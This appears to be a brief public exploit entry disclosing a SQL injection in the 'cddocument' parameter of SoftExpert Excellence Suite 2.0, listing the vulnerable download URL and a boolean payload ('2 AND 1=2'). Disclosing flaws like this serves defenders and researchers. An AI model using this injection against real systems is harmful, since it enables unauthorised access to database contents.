# Exploit Title: SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection
# Author: Seren PORSUK
# Date: 2018-06-28
# Type: webapps
# Platform: PHP
# CVE= N/A
# Vendor Homepage : https://www.softexpert.com/solucao/softexpert-excellence-suite/
# DETAILS
# A SQL injection vulnerability in the SoftExpert (SE) Excellence Suite 2.0
# allows remote authenticated users to perform SQL heuristics by pulling
# information from the database with the "cddocument" parameter in the
# "Downloading Electronic Documents" section.
# Vulnerable Parameter Type : GET
# Vulnerable Parameter : cddocument
#Vulnerable URL :
http://localhost/se/v75408/generic/gn_eletronicfile_view/1.1/view_eletronic_download.php?class_name=dc_eletronic_file&classwaybusinessrule=class.dc_eletronic_file.inc&action=4&cddocument=[SQLi]&saveas1&mainframe=1&cduser=6853
#SQLi Parameter : 2 AND 1=2